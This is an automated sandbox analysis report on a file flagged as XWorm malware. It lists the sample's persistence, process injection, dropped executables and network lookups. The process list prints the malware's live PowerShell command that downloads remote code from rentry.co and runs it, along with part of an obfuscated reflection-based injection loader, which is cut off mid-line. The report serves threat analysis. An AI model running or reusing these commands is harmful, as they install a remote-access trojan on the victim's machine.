Analysis Overview
SHA256
710973dd8cbda36be8352649d6f4c15d875d9625b0baba345b3e86b474a14334
Threat Level: Known bad
The file Ramo 🖤.jfif was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Xworm
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 06:38
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-15 06:38
Reported
2024-06-15 06:41
Platform
win10-20240404-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4704 created 584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4704 set thread context of 1392 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\svchost32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\svchost32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Ramo 🖤.jpg"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3dc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell "irm rentry.co/el3rabtweakpc/raw | iex"
C:\Windows\svchost32.exe
"C:\Windows\svchost32.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\x4s.exe
"C:\Users\Admin\AppData\Local\Temp\x4s.exe"
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:khEvmJBtshVX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oqdenpUqsFCKNm,[Parameter(Position=1)][Type]$XGpiBkYPPD)$oNsjiKuNkvL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'l'+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+'e',$False).DefineType('My'+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+'pe',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+',An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$oNsjiKuNkvL.DefineConstructor('R'+[Char](84)+'Sp'+'e'+''+[Char](99)+'i'+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+'g,P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$oqdenpUqsFCKNm).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'ge'+'d'+'');$oNsjiKuNkvL.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+'eB'+'y'+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+'r'+''+'t'+'u'+'a'+''+[Char](108)+'',$XGpiBkYPPD,$oqdenpUqsFCKNm).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $oNsjiKuNkvL.CreateType();}$iRZqyXNIegaeS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 